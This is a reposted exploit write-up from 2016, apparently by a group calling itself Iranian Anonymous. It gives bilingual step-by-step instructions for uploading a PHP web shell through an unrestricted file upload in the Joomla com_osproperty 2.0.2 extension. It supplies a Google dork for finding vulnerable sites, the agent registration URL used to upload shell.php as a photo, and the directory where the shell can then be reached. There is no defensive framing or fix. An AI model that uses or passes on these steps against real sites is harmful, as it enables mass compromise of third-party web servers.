IT博客汇 | [EXP]Joomla com_osproperty 2.0.2 GetShell

[EXP]Joomla com_osproperty 2.0.2 GetShell

K8拉登哥哥发表于 2016-05-20 11:25:45
 ##########################
# Exploit Title:  joomla com property unrestricted file upload image php
# Dork Google : inurl:/com_osproperty
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Vendor: http://extensions.joomla.org
# Version: 2.0.2
# Tested on : Linux(arch)-Windows(7ultimate)
###########################

#1.Go to this route Ingrese a esta ruta

http://site.com/component/osproperty/?task=agent_register

#############################

#2.Complete the form, raising the shell.php instead of your photo

Complete el formulario, subiendo la shell.php en lugar de su foto

#############################

#3.Locate your file in the root /osproperty/agent/

Busque su archivo en la raiz /osproperty/agent/

http://site.com/images/osproperty/agent/randomid_yourshell.php

#############################

#Help:This path can help you find your web shell in case you need it

Este path le puede ayudar a encontrar su web shell en caso q lo necesite

component/osproperty/?task=agent_default

############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd [email protected] ||

MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||

And All Of Iranian Anonymous .

# Discovered By: Hacker Khan